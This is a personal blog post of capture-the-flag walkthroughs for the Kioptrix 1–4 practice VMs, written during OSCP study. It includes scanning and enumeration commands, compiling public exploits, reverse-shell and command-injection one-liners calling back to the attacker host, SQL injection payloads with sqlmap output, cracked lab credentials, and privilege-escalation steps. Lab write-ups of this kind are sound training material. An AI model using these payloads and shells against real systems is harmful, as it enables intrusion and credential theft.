I have decided to start studying towards a CISSP and / or an OSCP, as part of that I saw an excellent blog post recommending to go through a lot of CTF challenges from vulnhub.com. These are my Kioptrix walkthrough guides / findings and observations for each of the first 4 available kioptrix images.

Kioptix level 1

For the first installation, I was following the walkthrough guides available on the net. Most guides say the first step is to map the network.

netdiscover
# or
nmap -sn 192.168.x.x/24

You can see my versions for mapping networks here: https://jonathansblog.co.uk/linux-commands-for-networking#advanced-linux-network-commands

nmap -sn 192.168.x.x/24

Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400

IP At MAC Address Count Len MAC Vendor / Hostname

192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.


Next, scan the host and get version info for services

nmap -sV 192.168.x.x
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind syn-ack 2 (RPC #100000)
139/tcp open netbios-ssn syn-ack Samba smbd (workgroup: 7MYGROUP)
443/tcp open ssl/http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status syn-ack 1 (RPC #100024)

Next thing is searchsploit (run everything through it)

searchspliot

Then, choice between the results (also, a general google search is great here, as is a search on exploit db)

SSHD

** try to log in with blank creds
** try to log in with default creds (eg root/toor)

SMB

enumeration
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/

enum4linux
nmap --script smb-vuln* -p 139,445 192.168.x.x

HTTPD

** manually browse http server
** manually wget the robots.txt
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
** manually browse http server
** manually wget the robots.txt

Scan the website

Kioptrix walkthroughs skipfish
nikto -h 192.168.x.x
dirbuster

There will be programs to run for other services too
First thing to note is that everything on this host is ancient

You can see that the version of apache and openssl are very old

A quick google for apache 1.3.20 vulnerability (excluding all the walkthorugh guides) shows OpenFuck.c

From exploitdb we can also see the original exploit:
https://www.exploit-db.com/exploits/764

From searchsploit, we can see that we have the source already in kali

searchsploit openfuck

There is a link at the top of the exploit. which takes us here:
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

Following the instructions still cant compile the exploit (its 13 years old at this point). A quick google for ‘openfuck kali compile’ gives us this:
https://github.com/heltonWernik/OpenLuckWhich compiles nicely :D Running is just a matter of:

./OpenFuck target box [port]

Target is a list of hex codes for specific platform / apache version combinations (eg redhat / apache-1.3.20 is 0x6a and 0x6b) [try them both…]

Listeners

On kali machine:

nc -nlvp 8080

Once you have a shell, on target machine, execute:

bash -i >& /dev/tcp/192.168.x.x/8080 0>&1

Boom.

Kioptix level 2

Start with mapping the network:

netdiscover
# or
nmap -sn 192.168.x.x/24

You can see my versions for mapping networks here: https://jonathansblog.co.uk/linux-commands-for-networking#advanced-linux-network-commands

Currently scanning: 192.168.x.x/16   |   Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400

IP At MAC Address Count Len MAC Vendor / Hostname

192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.

Then an nmap of the host

root@kali:~# nmap -sV 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 20:25 UTC
Nmap scan report for 192.168.x.x
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
800/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 70:56:81:BE:16:0B (Apple)

SSHD

** try to log in with blank creds
** try to log in with default creds (eg root/toor)

HTTPD

** manually browse http server
** manually wget the robots.txt

Spider the website

nikto -h 192.168.x.x
dirbuster

Sqli (very basic, but try all input boxes with the following)

' or '1' = '1

Command injection

; cat/etc/passwd

Listener

On kali machine:

nc -nlvp 8080

On target (in the input field), paste

;bash -i >& /dev/tcp/192.168.x.x/8080 0>&1

Boom. you have a shell

Expliots

exploitdb.com/exploits/1397
exploitdb.com/exploits/9542

Compile with:

gcc -o 1397 1397.c
gcc -o 9542 9542.c

Spawn a quick http server (on kali box)

python -m SimpleHTTPServer 8080

In kioptix, cd to /tmp (you cant write anywhere else) then

cd /tmp
wget http://192.168.x.x:8080/1397
wget http://192.168.x.x:8080/9542

You’ll see that this doesn’t work (because the vm is 32 bit), even gcc -m32 didn’t work for me. So, inside kioptix /tmp, wget the exploits, compile and run.

cd /tmp
wget http://exploitdb.com/download/1397.c
wget http://exploitdb.com/download/9542.c
gcc -o 1397 1397.c
gcc -o 9542 9542.c
chmod +x 1397
chmod +x 9542
./1397
./9542

Boom. you got root (and lots of things to tidy up).

Kioptix level 3

As usual, start by getting info on the machines in the network

netdiscover
nmap -sn 192.168.x.x/24

Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400

IP At MAC Address Count Len MAC Vendor / Hostname

192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.

Once you have the IP address, an nmap is in order

nmap -sV 192.168.x.x 

And we can see that there is a (very) old apache / php running

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 19:10 UTC
Nmap scan report for 192.168.x.x
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 70:56:81:BE:16:0B (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH

Exploits:
cvedetails.com/version/169731/Openbsd-Openssh-4.7p1.html
N
o code execution or priv escalations :(

HTTPD

** manually browse http server
** manually wget the robots.txt
Spider the website

nikto -h 192.168.x.x 
dirbuster for httpd

Exploits:
https://httpd.apache.org/security/vulnerabilities_22.html
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/hasexp-1/Apache-Http-Server-2.2.8.html

There is one with a CVE score of 7.8

php

Searching google for “PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch vulnerability” we find https://www.exploit-db.com/exploits/29290

An exploit that will give us code execution which should work on our machine, except it doesnt compile on kali :(
We could modify it (for a few hours), so we will keep this as a ‘maybe’

Browsing the app on http, we find that there is a login form, which we check for sqli

http://kioptrix3.com/index.php?system=Admin&page=loginSubmit
POST
username=1' or '1'='1
password=1' or '1'='1

It doesn’t work, but there are other forms, so we check those too

Crawling the site

Spider the website
(seofrog is fantastic for this)

  • http://kioptrix3.com/gallery/vote.php?id=5&vote=4&from=%2Fgallery%2Fp.php%2F5%3F%3F
  • http://kioptrix3.com/index.php?system=Blog&post=1281005380
  • http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
  • http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos
Kioptrix walkthrough skipfish
Running skipfish

We find that the ID parameter is injectable (skipfish shows us)

Kioptrix walkthrough skipfish
skipfish showing mysql error (indicates sqli)

We run an sqlmap (very noisy, but we are n00bs at this stage, so we run it anyway)

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

We then get lots of information:

sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:

sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (2170=2170) THEN 1 ELSE (SELECT 4104 UNION SELECT 2961) END))

Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5709,4486)>(SELECT COUNT(),CONCAT(0x716a6b7671,(SELECT (ELT(5709=5709,1))),0x7178717171,FLOOR(RAND(0)2))x FROM (SELECT 1973 UNION SELECT 7702 UNION SELECT 7453 UNION SELECT 7745)a GROUP BY x)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)

Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: id=1 UNION ALL SELECT 1980,CONCAT(0x716a6b7671,0x545a47644e42704f6c746a754474645973424c7541625778574e657552446a6467496359744e425a,0x7178717171),1980,1980,1980,1980#

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
available databases [3]:
[] gallery [] information_schema
[*] mysql

We can then run sqlmap -a on the id parameter and get a dump of all the databases.

Kioptrix walkthrough sqlmap
sqlmap running

There is a table in the gallery database that looks interesting: dev_accounts

dreg,0d3eccfb887aabd50f243b3f155c0f85
loneferret,5badcaf789d3d1d09794d8f021f40f0e

We run those through an online md5 database and get the following:

dreg: Mast3r
loneferret: starwars

The first thing we try is to log in to the machine (and any other services)

Going back to the admin area, we find that it running lotuscms, a quick google search shows this:
https://www.rapid7.com/db/modules/exploit/multi/http/lcms_php_exec

An RCE, just what we need :) There is also an exploit: exploit-db.com/exploits/1596. Its in python, which is nice

./15964 -t http:192.168.x.x -d /

It doesn’t work on my kali box, so I add this to the ‘maybe’ pile

I try logging in with ssh and it works.
I do a quick LS and see a file called ‘checksecurity’ and another called companypolicy

Reading the company policy doc reveals that everyone has to use ‘sudo ht’ to make edits.

Running sudo ht allows me to edit the /etc/sudoers file and add /bin/sh

I can then sudo sh and get root.

kioptrix3 pwned

Kioptrix level 4

Starting with the network mapping:

netdiscover 

Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400

IP At MAC Address Count Len MAC Vendor / Hostname

192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.

Or an nmap -sn 192.168.x.x/24

Once you have the IP address, an nmap is in order

nmap -sS -A -n 192.168.x.x 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 15:14 UTC
Nmap scan report for 192.168.x.x
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:32:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|clock-skew: mean: 48m30s, deviation: 2h49m43s, median: -1h11m30s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain | System time: 2019-04-17T10:03:19-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.x.x
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Ubuntu
Running: Linux 2.6.X (inux 2.6.9 - 2.6.33)
services:
ssh 4.7p1 Debian 8ubuntu1.2
http
Apache/2.2.8 (Ubuntu)
PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Samba smbd 3.0.28a

SMB

** try to log in with blank creds
** try to log in with default creds (eg root/toor)
** manually browse http server
** manually wget the robots.txt

Enumeration:
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/

enum4linux 192.168.x.x

We get a list of users:

  • loneferret
  • john
  • root
  • robert
  • nobody
nmap --script smb-vuln* -p 139,445 192.168.x.x

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 16:42 BST
Nmap scan report for 192.168.0.23
Host is up (0.00060s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds

We have a possible vulnerability

smbclient -L 192.168.x.x

HTTPD

Try a basic sqli:

user: '
pass: '

We see an error message (Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28)

user: john
pass: 1' or '1' = '1
sqli allows login to an account, which then shows the plaintext password

We get a screen that shows the password for the user john

We can then log in to ssh :)

ssh john@192.168.x.x

From this point, I had to use a guide, the process went:

  • Dig about in the php source code, find the creds to the database (I had found these, but hadn’t done anything with them)
  • Then you get the creds for the ‘root’ mysql user
  • Then check which user mysql runs as (root)
  • Then check for a mysql function that allows system calls
  • Then issue a system call to add john to the admin group
  • Then sudo su
  • Then you have root..
Kioptrix4 pwned

Overall learning:

I took a lot form the various walkthroughs that I read (I tried to defeat the systems myself, but had to resort to various walkthrough guides at various points)

The obvious things that I learned are that not everything has to be a software bug / some exploits are purely configuration

Nmap

Stealthy nmap scans are better:

instead of nmap -sn, use 
nmap -Pn --disable-arp-ping -sT --top-ports 20 --open
nmap -Pn --disable-arp-ping -sS -p- -T4 --defeat-rst-ratelimit

And also try

nmap -Pn --disable-arp-ping -p 22,80,111,139,443,1024 -sT -sV -A 10.200.1.3
nmap -Pn --disable-arp-ping -p 111,137,138,1026 -sU -sV -A 10.200.1.3

Spawning shells

There are tons of ways to spawn a shell:

bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
#(From within IRB)
exec "/bin/sh"
#(From within vi)
:!bash
#(From within vi)
:set shell=/bin/bash:shell
#(From within nmap)
!sh